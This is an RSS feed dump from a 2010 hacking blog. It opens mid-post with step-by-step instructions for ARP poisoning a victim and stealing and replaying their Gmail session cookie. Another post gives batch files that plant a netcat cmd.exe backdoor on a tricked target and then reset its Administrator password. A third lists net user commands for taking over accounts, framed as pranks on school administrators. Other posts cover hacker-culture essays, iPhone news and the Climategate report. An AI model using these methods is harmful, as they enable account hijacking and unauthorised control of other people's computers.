The main things to know here are your IP address and your default gateway.&lt;/blockquote&gt;&lt;br /&gt;
Make a note of your IP address &amp;amp; default gateway. In Cain you will see the list of IP addresses; here you have to choose a free IP address that is not used anywhere. We assume IP 192.168.1.10 is not used anywhere on the network.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Click on Configure &amp;gt; APR &amp;gt; Use Spoofed IP and MAC Address &amp;gt; IP&lt;br /&gt;
&lt;br /&gt;
Type in 192.168.1.10, and from the poisoning section click on “Use ARP request Packets” and click on OK.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Within the Sniffer tab, click on the APR tab below. From the left-hand side click on APR, then click on the top right-hand spreadsheet and click on the plus sign tool at the top. The moment you click it, it will show you the list of IP addresses on the left-hand side. Here we will target the victim's IP address and the default gateway.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The purpose is to do ARP poisoning between the victim and the default gateway and route the victim's traffic via your machine. From the left side click on the victim's IP address; we assume the victim is using 192.168.1.15. The moment you click on the victim's IP you will see the remaining list on the right-hand side; here you have to select the default gateway IP address, i.e. 192.168.1.1, then click on OK.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Finally, click on the Start/Stop Sniffer tool menu once again, and next click on Start/Stop APR. This will start poisoning the victim and the default gateway.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
B] Using Network Miner to capture the cookie in plain text&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
We are using Network Miner to capture the cookie, but Network Miner can be used for many things: capturing text, images, HTTP parameters, files. Network Miner is normally used in passive reconnaissance to collect IP, domain and OS fingerprint information of the devices connected to your machine. If you don’t have Network Miner you can use any other sniffer available, like Wireshark, Iris Network Scanner, NetWitness, etc.&lt;br /&gt;
&lt;br /&gt;
We are using this tool because of its ease of use.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Open Network Miner by clicking its exe (please note it requires the .NET Framework to work).&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * From the “---Select network adaptor in the list---“ drop-down, click the down arrow and select your adaptor. If you are using a wired Ethernet network, your adaptor's name will contain Ethernet and the IP address of your machine; if you are using wireless, the adaptor name will contain Wireless and your IP address. Select the one you are using and click on Start.&lt;br /&gt;
&lt;br /&gt;
An important thing before you start: make sure you are not browsing any websites or using any instant messaging, and that you have cleared all cookies from Firefox.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Click on the Credential tab above. This tab will capture all HTTP cookies; take a close look at the “Host” column, where you should see mail.google.com somewhere. If you can locate the mail.google.com entry, then in the same entry right-click on the Username column and click on “copy username”, then open Notepad and paste the copied content there.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Turn off word wrap in Notepad and search for GX in the line. What you have captured will contain many cookies from Gmail, each separated by a semicolon (the GX cookie will start with GX= and end with a semicolon; you have to copy everything between the = and the semicolon).&lt;br /&gt;
&lt;br /&gt;
Example : GX= axcvb1mzdwkfefv ; ← copy only axcvb1mzdwkfefv&lt;br /&gt;
&lt;br /&gt;
Now that we have captured the GX cookie, it is time to use this cookie to replay the attack and log in to the victim's email ID; for this we will use Firefox and the Cookie Editor add-on.&lt;br /&gt;
&lt;br /&gt;
C] Using Firefox &amp;amp; Cookie Editor to replay the attack.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Open Firefox and log in to your own Gmail account.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * From Firefox click on Tools &amp;gt; Cookie Editor.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * In the filter box type .google.com and press Filter, and from the list below search for the cookie named GX. If you locate GX, double-click on that GX cookie, then delete everything in the content box and paste the GX cookie you captured in step B.4, click on Save and then Close.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * In the address bar of Firefox type mail.google.com and press Enter. This should replay the victim's GX cookie to the Gmail server and you would get logged in to the victim's Gmail account.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; * Sorry! You can’t change the password with a cookie attack.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
How to protect yourself from this kind of attack?&lt;br /&gt;
Google has provided a way out of this attack: use the secure cookie instead of the insecure one. You can enable the secure cookie option by setting Gmail to always use HTTPS; the session cookie is then sent only over the encrypted connection, so it never crosses the network in plain text where a sniffer could capture it.&lt;br /&gt;
Settings &amp;gt; Browser connection &amp;gt; Always use https</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/sPpLjL07lyk/hacking-gmail-account-using-gx-cookie.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/09/hacking-gmail-account-using-gx-cookie.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-5653430841114538381</guid><pubDate>Thu, 30 Sep 2010 18:17:00 +0000</pubDate><atom:updated>2010-09-30T11:17:26.906-07:00</atom:updated><title>Simple cmd.exe tricks for starters</title><description>Introduction&lt;br /&gt;
&lt;br /&gt;
Hey guys, yeah, this is my first posting here. These are just some simple little things I like to use to cause no end of frustration to my school administrators... yeah, I'm mainly a white hat though.&lt;br /&gt;
&lt;br /&gt;
Background&lt;br /&gt;
&lt;br /&gt;
Basically these are just some simple cmd.exe commands that normal people don't know about. Actually, most people don't even know what cmd.exe is, and as soon as you open it they're like 'oh shit, you must be a hacker'. God damn stereotypes.&lt;br /&gt;
&lt;br /&gt;
The code&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ok, the first command is to see all the users on the computer.&lt;br /&gt;
The second will change the password of any user (including the admin). Note: unless you are using a network command-line interface, e.g. PowerShell, it will only change the password of the admin on that individual computer, which is still pretty useful.&lt;br /&gt;
The next adds a new user to the computer.&lt;br /&gt;
You guessed it, this one deletes a user.&lt;br /&gt;
And this one adds a user to a local group.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;net user&lt;br /&gt;
net user (username) * [note: just start typing the new password; nothing will appear on screen while you type, then hit Enter when you're done]&lt;br /&gt;
net user (username) /add&lt;br /&gt;
net user (username) /del&lt;br /&gt;
net localgroup (localgroup, e.g. administrators) (username) /add&lt;/blockquote&gt;</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/7l4DhdTspqU/simple-cmdexe-tricks-for-starters.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/09/simple-cmdexe-tricks-for-starters.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-6400101093381836725</guid><pubDate>Thu, 30 Sep 2010 18:16:00 +0000</pubDate><atom:updated>2010-09-30T11:16:20.755-07:00</atom:updated><title>Hacking a Network Computer</title><description>I wrote this because it really worked for me a few times and I hope it does for you too; all you need is a very gullible target.&lt;br /&gt;
&lt;br /&gt;
As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in:&lt;br /&gt;
Code:&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;@echo off&lt;br /&gt;
&lt;br /&gt;
cd\&lt;br /&gt;
xcopy \\yourIP\shared folder\netcat.exe&lt;br /&gt;
copy \\yourIP\shared folder\netcat.exe (just to be sure)&lt;br /&gt;
cd "Documents and Settings"&lt;br /&gt;
cd "All Users"&lt;br /&gt;
cd "Start Menu"&lt;br /&gt;
cd Programs&lt;br /&gt;
cd Startup&lt;br /&gt;
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)&lt;br /&gt;
cd\&lt;br /&gt;
netcat.exe -L -p 9999 -d -e cmd.exe&lt;/blockquote&gt;&lt;br /&gt;
Save the file as a batch file using Notepad.&lt;br /&gt;
&lt;br /&gt;
The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;@echo off&lt;br /&gt;
&lt;br /&gt;
cd\&lt;br /&gt;
netcat.exe -L -p 9999 -d -e cmd.exe&lt;/blockquote&gt;&lt;br /&gt;
Save the file as a batch file using Notepad; this will be the file that is copied into the startup folder by the previous batch file we wrote. You can bind the batch file to another file and share that file, and let the target execute that file so that it copies netcat and the other batch file onto his/her computer, thus opening port 9999. After port 9999 has been opened you can then use telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in, change the Administrator password in case something happens to your files; the command is this:&lt;br /&gt;
&lt;br /&gt;
net user Administrator newpassword&lt;br /&gt;
&lt;br /&gt;
Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:&lt;br /&gt;
&lt;br /&gt;
shutdown -r -t 10 -c "Hello"&lt;br /&gt;
&lt;br /&gt;
the computer will then restart in 10 seconds' time. You can even play around more by installing Cain &amp;amp; Abel on your computer and then installing Abel remotely on his computer (since you know the Administrator password). Once you have Abel on the target you can start and stop services and do more!&lt;br /&gt;
&lt;br /&gt;
Enjoy.</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/rhE06PnYKvc/hacking-network-computer.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/09/hacking-network-computer.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-7382410948181721413</guid><pubDate>Sun, 05 Sep 2010 19:49:00 +0000</pubDate><atom:updated>2010-09-05T12:49:54.996-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking tutorials</category><title>What do hackers do with the information they steal?</title><description>A question that we hear a lot when it comes to cyber-crime: What are hackers after, anyways?&lt;br /&gt;
There are a lot of different types of hackers and computer scammers out there, so there’s no one answer. Some of them are just practical jokers, some use viruses to get revenge on the company they were fired from, or just to bother random people online. The main reason hacking exists, however, is that it’s a great way to make a dishonest living by stealing information from unsuspecting users.&lt;br /&gt;
&lt;br /&gt;
If you have the know-how, the time, and the lack of moral scruples, it’s really not that hard to crack into someone’s computer with a spybot and monitor their activity, or even to take control of their computer from afar and look right into their files.&lt;br /&gt;
&lt;br /&gt;
So now the question becomes “Why?” Why do hackers want that information so badly?&lt;br /&gt;
There are a number of things a hacker can do with the information they steal from you. The most obvious example would be, of course, that they can steal your financial information or your identity, using your credit card number to buy whatever they like or even getting into your bank account.&lt;br /&gt;
&lt;br /&gt;
That’s the scariest kind of hacker, anyways, but even if you don’t have any of your financial information on your PC, you’re still a target for info and identity theft.&lt;br /&gt;
&lt;br /&gt;
Besides outright stealing your identity and spending your hard-earned money for you, many hackers will settle for some more mundane details, such as using spyware to look at your browser history, email, internet proxy, anything they can get hold of, and then selling that to unscrupulous advertisers who flood your inbox with spam and fill your screen with pop-ups.&lt;br /&gt;
&lt;br /&gt;
Back when computers were more of a hobby than a serious part of one’s everyday life, we really didn’t have much info on our PCs worth stealing. In those days, viruses were relatively benign. Maybe they’d make your computer do something weird, maybe pop up an image or a message, like THE CREEPER, the first computer virus, which simply made your computer monitor read “I’M THE CREEPER, CATCH ME IF YOU CAN”. For the most part, they were harmless practical jokes.&lt;br /&gt;
&lt;br /&gt;
There still are those practical joker hackers out there, but what hacking has largely become is an illegal multimillion-dollar-a-year industry, a great way for con artists to make a quick buck without even having to put themselves at risk by lying to your face.&lt;br /&gt;
&lt;br /&gt;
The bottom line is that hackers want money, and they don’t care how they get it. If they can take your bank account information, they will, and if they can’t, they’ll settle for some personal info to sell to spammers.&lt;br /&gt;
Luckily, a good security program will generally protect you from most hackers, but they’re working ‘round the clock to figure out how to bypass your security measures and how to find new weak points, so it’s important that the methods you use to protect yourself evolve at a faster pace than the hackers’ methods.</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/X_in4pzRk3U/what-do-hackers-do-with-information.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/09/what-do-hackers-do-with-information.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-4981064459899633363</guid><pubDate>Mon, 19 Jul 2010 17:11:00 +0000</pubDate><atom:updated>2010-07-19T10:11:41.303-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">iphone 4g</category><title>iPhone 4 Coming to India in October</title><description>&lt;br /&gt;
&lt;img alt="iPhone 4" border="0" height="343" src="http://img.labnol.org/di/iphone_41.jpg" title="Apple iPhone 4" width="540" /&gt;&lt;br /&gt;
&lt;br /&gt;
If you are looking to buy the latest &lt;a href="http://www.apple.com/iphone/"&gt;iPhone 4&lt;/a&gt; in India through the official channels, you might have to wait until Diwali. &lt;br /&gt;
&lt;br /&gt;
An Airtel executive recently confirmed to &lt;a href="http://online.wsj.com/article/SB10001424052748703720504575376560767687800.html?mod=googlenews_wsj"&gt;Reuters&lt;/a&gt; that the company is planning to launch iPhone 4 in India but around the September or October timeframe. &lt;br /&gt;
&lt;br /&gt;
There’s no mention of price but it will obviously cost you more than a mid-range laptop. It is also not known if Apple / Airtel will offer free bumpers to iPhone 4 owners in India like they do in the U.S. to fix the antenna-related issues.&lt;br /&gt;
&lt;br /&gt;
Vodafone, the only other cellular operator that sells the iPhone in India, has not confirmed their own launch dates yet. &lt;br /&gt;
&lt;br /&gt;
If you want an iPhone 4 now and don’t mind paying the premium, there’s always the unofficial route – buy a locked iPhone 4 from the US and jailbreak it on your own, or get one from either the UK or Canada. Apple is selling unlocked iPhones in these countries and therefore they’ll work out-of-the-box with any GSM SIM.</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/ja7ciiWX344/iphone-4-coming-to-india-in-october.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/07/iphone-4-coming-to-india-in-october.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-6218793155761688641</guid><pubDate>Tue, 13 Jul 2010 18:59:00 +0000</pubDate><atom:updated>2010-07-13T11:59:00.991-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking tutorials</category><title>Before you begin to learn-Hacking</title><description>&lt;b&gt;Before you begin to learn-Hacking&lt;/b&gt;&lt;br /&gt;
You need to learn a few important points:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. The world is full of fascinating problems waiting to be solved.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.&lt;br /&gt;
&lt;br /&gt;
If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.&lt;br /&gt;
&lt;br /&gt;
(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)&lt;br /&gt;
&lt;b&gt;2. No problem should ever have to be solved twice.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.&lt;br /&gt;
&lt;br /&gt;
To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.&lt;br /&gt;
&lt;br /&gt;
Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.&lt;br /&gt;
&lt;br /&gt;
(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)&lt;br /&gt;
&lt;b&gt;3. Boredom and drudgery are evil.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.&lt;br /&gt;
&lt;br /&gt;
To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).&lt;br /&gt;
&lt;br /&gt;
(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)&lt;br /&gt;
&lt;b&gt;4. Freedom is good.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.&lt;br /&gt;
&lt;br /&gt;
(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)&lt;br /&gt;
&lt;br /&gt;
Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.&lt;br /&gt;
&lt;b&gt;5. Attitude is no substitute for competence.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.&lt;br /&gt;
&lt;br /&gt;
Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.&lt;br /&gt;
&lt;br /&gt;
If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/YLQGLKZpPyM/before-you-begin-to-learn-hacking.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/07/before-you-begin-to-learn-hacking.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-5275383204768705891</guid><pubDate>Tue, 13 Jul 2010 18:57:00 +0000</pubDate><atom:updated>2010-07-13T11:57:57.987-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking tutorials</category><title>The Hacker Attitude</title><description>Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.&lt;br /&gt;
&lt;br /&gt;
But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.&lt;br /&gt;
&lt;br /&gt;
Or, as the following modern Zen poem has it:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    To follow the path:&lt;br /&gt;
    look to the master,&lt;br /&gt;
    follow the master,&lt;br /&gt;
    walk with the master,&lt;br /&gt;
    see through the master,&lt;br /&gt;
    become the master.&lt;br /&gt;
&lt;br /&gt;
So, if you want to be a hacker, repeat the following things until you believe them:</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/OSDgz0cHaEo/hacker-attitude.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/07/hacker-attitude.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-6335260731090401120</guid><pubDate>Tue, 13 Jul 2010 18:57:00 +0000</pubDate><atom:updated>2010-07-13T11:57:05.127-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">hacking tutorials</category><title>What Is a Hacker?</title><description>What Is a Hacker?&lt;br /&gt;
&lt;br /&gt;
The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant.&lt;br /&gt;
&lt;br /&gt;
There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.&lt;br /&gt;
&lt;br /&gt;
The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.&lt;br /&gt;
&lt;br /&gt;
There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.&lt;br /&gt;
&lt;br /&gt;
The basic difference is this: hackers build things, crackers break them.&lt;br /&gt;
&lt;br /&gt;
If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/14-pbfDY74g/what-is-hacker.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/07/what-is-hacker.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-1099898442700027378</guid><pubDate>Sat, 10 Jul 2010 18:50:00 +0000</pubDate><atom:updated>2010-07-10T11:50:14.680-07:00</atom:updated><title>'Climategate' report: the main points</title><description>&lt;a href="http://www.guardian.co.uk/environment/2010/jul/07/climategate-scientists-main-points"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div&gt;&lt;img alt="" height="1" src="http://hits.guardian.co.uk/b/ss/guardiangu-feeds/1/H.20.7/57080?ns=guardian&amp;amp;pageName=%27Climategate%27+report%3A+examining+the+main+allegations%3AArticle%3A1423474&amp;amp;ch=Environment&amp;amp;c3=Guardian&amp;amp;c4=Hacked+climate+science+emails%2CClimate+change+%28Science%29%2CClimate+change+%28Environment%29%2CClimate+change+scepticism+%28environment%29%2CUniversity+of+East+Anglia%2CEducation%2CEnvironment%2CUK+news%2CHacking+%28Technology%29%2CTechnology%2CHigher+education%2CScience&amp;amp;c5=Not+commercially+useful%2CClimate+Change%2CEducation+Weekly+Education%2CEthical+Living%2CCorporate+IT%2CHigher+Education&amp;amp;c6=David+Adam&amp;amp;c7=10-Jul-07&amp;amp;c8=1423474&amp;amp;c9=Article&amp;amp;c10=News&amp;amp;c11=Environment&amp;amp;c13=&amp;amp;c25=&amp;amp;c30=content&amp;amp;h2=GU%2FEnvironment%2FHacked+climate+science+emails" width="1" /&gt;&lt;/div&gt;From manipulating data to censoring articles, 150-page report clears scientists of main allegations against them&lt;br /&gt;
Was it the greatest scandal in modern science or a storm in a teacup whipped up by climate sceptics and an uncritical media? The report from a panel of experts led by Sir Muir Russell into the 'climategate' affair that saw thousands of personal emails from global warming scientists released on to the internet was eagerly awaited by all sides.&lt;br /&gt;
The report, which effectively cleared the scientists of the most serious charges – including deliberately fudging climate change results, is unlikely to be the final word on the matter, as the University of East Anglia and the beleaguered director of its Climatic Research Unit, Phil Jones, would have hoped.&lt;br /&gt;
As the panel noted: 'Emails are rarely definitive evidence of what actually occurred.' Those who argue that climate change is a conspiracy of crooked scientists will find little problem in labelling the latest vindication a whitewash. But the panel's report, which runs to some 150 pages, covers in detail the main allegations made against the scientists.&lt;br /&gt;
&lt;h2&gt;&lt;b&gt;Temperature data&lt;/b&gt;&lt;/h2&gt;One of the most common allegations made against the CRU scientists was that they blocked access to raw data, drawn from weather stations around the world, and adjusted that data to falsely show a pattern of global warming. There were also complaints that they failed to release on demand the computer code they wrote to analyse the data. Without such information, how could sceptics check the CRU's calculations?&lt;br /&gt;
The panel showed that it was relatively straightforward to reproduce the CRU analysis without needing to ask Jones and his colleagues for anything.&lt;br /&gt;
They used data from public databanks and wrote their own computer code, which they say could be repeated by any 'competent researcher'. The results were similar to those of the CRU.&lt;br /&gt;
Their conclusion: 'A researcher can evidently produce a study which would test the CRU analysis quite precisely, without requiring any information from CRU to do so.'&lt;br /&gt;
To repeat, rather than reproduce, the CRU findings would require the CRU code and the list of weather stations it used to source the raw data. Such requests were made under freedom of information laws. The panel criticised the CRU response as 'unhelpful and defensive'.&lt;br /&gt;
On specific allegations of malpractice by Jones in the handling of weather station data from China, the panel did not comment directly, but concluded more generally: 'Crucially, we find nothing in the behaviour on the part of CRU scientists that is the subject of allegations ... to undermine the validity of their work.'&lt;br /&gt;
&lt;h2&gt;&lt;b&gt;Peer review and IPCC&lt;/b&gt;&lt;/h2&gt;The CRU scientists were accused of abusing their positions to unfairly and improperly skew the process of scientific publication, to censor articles that criticised their own work or questioned their view of climate change. The panel analysed three cases in detail; it could not find enough evidence to judge a fourth.&lt;br /&gt;
In the three cases examined, the panel said that none 'represents subversion of the peer review process nor unreasonable attempts to influence the editorial policy of journals'. Comments that critics may view as 'partial and aggressive' were more likely to represent 'the rough and tumble of interaction in an area of science that has become heavily contested and where strongly opposed and aggressively expressed positions have been taken up on both sides'.&lt;br /&gt;
Climate science is not unusual in this regard, it said, and areas such as medicine see similar strongly worded disputes.&lt;br /&gt;
Because the CRU scientists were heavily involved in the work of the Intergovernmental Panel on Climate Change (IPCC), that climate body's reports also came under fire. Again, the criticism was that CRU scientists had squashed dissent. Again, the panel dismissed the allegations. The IPCC text was a team responsibility, it said, and there was no improper exclusion of material.&lt;br /&gt;
&lt;h2&gt;&lt;b&gt;Proxy reconstructions&lt;/b&gt;&lt;/h2&gt;The CRU scientists were world leaders in a branch of science that uses tree rings and other evidence from the natural world to reconstruct temperatures in the distant past, before records were kept or instruments such as thermometers were available.&lt;br /&gt;
This led to a barrage of allegations, from suppression of data to questionable selection of data points. The panel effectively cleared the CRU scientists, with qualifications. Data on which CRU work depended should have been better archived, it said. But the panel found no evidence of exclusion of rival temperature series that would have shown a different result.&lt;br /&gt;
The CRU scientists were, however, criticised for producing a 'misleading' figure for the front cover of a 1999 report from the World Meteorological Organisation. The figure, discussed in a much quoted email from Jones in which he used a 'trick' to 'hide the decline', spliced together proxy temperature data and instrument data. This was a valid technique but should have been better labelled, the panel said. It accepted there was no deliberate intent to mislead, as the full explanation was included in the report text.&lt;br /&gt;
&lt;h2&gt;&lt;b&gt;Transparency&lt;/b&gt;&lt;/h2&gt;The email saga is popularly thought to have begun as a reaction to the CRU's apparent unwillingness to release data and codes requested by a range of people under freedom of information laws. Jones and his colleagues may now regret that attitude.&lt;br /&gt;
The panel strongly criticised the actions of the CRU scientists towards such requests, and the broader university administration. There was a 'lack of engagement' and 'confusion' over how to handle such requests. Scientists and senior university officials failed to recognise that early disclosure of the requested information could have minimised the problems. Many of the responses that were made were unhelpful, or incomplete.&lt;br /&gt;
Some emails were deleted to avoid future release, though the panel pointed out this was allowed under FOI rules. Deleting information specifically requested is not allowed, but there was no evidence the CRU did this. 'We recognise that there was deep suspicion within CRU as to the motives of those making detailed requests,' the panel said. 'Nonetheless, the requirements of the legislation for release of information are clear and early action would likely have prevented much subsequent grief.'&lt;br /&gt;
On a wider point, it noted there was an ongoing 'transformation in the need for openness in the culture of publicly funded science', driven partly by changes in the law and the rise of internet bloggers.&lt;br /&gt;
Without such openness, the panel warned, 'the credibility of their work will suffer because it will always be at risk of allegations and hence malpractice'.&lt;br /&gt;
